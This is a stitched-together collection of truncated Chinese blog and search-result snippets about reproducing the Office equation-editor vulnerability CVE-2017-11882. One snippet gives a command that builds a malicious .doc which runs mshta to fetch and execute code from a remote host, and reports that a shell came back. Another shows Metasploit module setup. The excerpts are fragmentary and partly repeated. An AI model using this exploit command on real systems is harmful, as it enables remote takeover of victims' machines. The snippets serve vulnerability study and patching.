一、漏洞简介 本次漏洞还是一个office溢出漏洞,漏洞编号cve-2017-11882。该漏洞是office一个组件EQNEDT32.EXE引起的栈溢出,通杀office版本2007-2016。 二、复现环境 三、漏洞复现 在这里呢,我是使用了Ridter师傅的exp进行分析的,网址:https://github.com/Ridter/CVE-2017-11882/ 之后我们安装office2007,然后双击EX...
1、漏洞概述 这几个月来,针对微软Office套件最火热最流行的攻击手段,莫过于基于 CVE-2017-11882的漏洞利用。 2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,…
root@kali:~#cd /usr/share/metasploit-framework/modules/exploits/windows/smbroot@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb#cp ~/Desktop/CVE-2017-11882/CVE-2017-11882.rb CVE-2017-11882.rbroot@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb#ls vx:pinginglab...
python Command_CVE-2017-11882.py -c "mshta http://192.168.1.123:8080/123" -o test.doc 3.使用 office打开 成功返回shell,一套操作行云流水。 0x03 修复方案 1.下载微软对此漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,并且开启自动更新功能 2.在注册...
本文记录一下针对CVE-2017-11882的漏洞复现 0x00 前言 参考backlion师傅的PDF,记录一下这个过程。 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利...
漏洞丨cve2017-11882 一、漏洞简介 本次漏洞还是一个office溢出漏洞,漏洞编号cve-2017-11882。该漏洞是office一个组件EQNEDT32.EXE引起的栈溢出,通杀office版本2007-2016。 二、复现环境 三、漏洞复现 在这里呢,我是使用了Ridter师傅的exp进行分析的,网址:https://github.com/Ridter/CVE-2017-11882/ 之后我们...
本次漏洞还是一个office溢出漏洞,漏洞编号cve-2017-11882。该漏洞是office一个组件EQNEDT32.EXE引起的栈溢出,通杀office版本2007-2016。 二、复现环境 系统版本 目标程序 调试工具 辅助工具 win7 sp1 x86 office2007 olldbg Process-Monitor 三、漏洞复现
CVE-2017-11882复现-office命令执行 0x01 前言 11月14日,微软按照惯例发布了11月的安全更新,随后不久,安全公司EMBEDI在官方博客上公开了其向微软提交的编号为CVE-2017-11882的Office远程代码执行漏洞: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about...
应用软件-CVE-2017-11882 Office漏东复现 漏动原理: CVE-2017-11882是Microsoft Office软件中的一个远程代码执行漏动。该漏动是由Microsoft Equation Editor(公式编辑器)中的内存处理错误引起的。公鸡者可以利用这个漏动在受害者的系统上执行恶意代吗,从而获得对系统的控制权。
CVE-2017-11882复现 技术标签: 漏洞前言 漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsof... 查看...